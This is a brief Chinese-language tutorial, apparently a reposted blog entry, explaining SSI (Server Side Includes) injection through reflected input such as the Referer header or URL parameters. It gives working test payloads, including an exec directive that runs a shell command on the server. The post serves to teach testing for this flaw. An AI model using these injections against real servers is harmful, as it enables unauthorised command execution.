原文鏈接:http://wyb0.com/posts/ssi-injection/
0x00 SSI
SSI (Server Side Includes)是HTML頁面中的指令,在頁面被提供時由服務(wù)器進(jìn)行運(yùn)算,以對現(xiàn)有HTML頁面增加動態(tài)生成的內(nèi)容,而無須通過CGI程序提供其整個頁面,或者使用其他動態(tài)技術(shù)。
在很多場景中,用戶輸入的內(nèi)容可以顯示在頁面中,一個存在反射XSS漏洞的頁面,如果輸入的payload不是xss代碼而是ssi的標(biāo)簽,服務(wù)器又開啟了ssi支持的話就會存在SSI漏洞
若注入點(diǎn)在url中則可能需要進(jìn)行url編碼
0x01 payload
"-->'-->`--><!--#set var="a" value="123"--><!--#set var="b" value="654"--><!--#echo var="a"--><!--#echo var="b"-->
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="dir" -->
0x02 示例
-
Referer被輸出到了頁面中
圖片.png -
url中的數(shù)據(jù)被輸出到頁面中(有時候url中的payload需要url編碼)
圖片.png

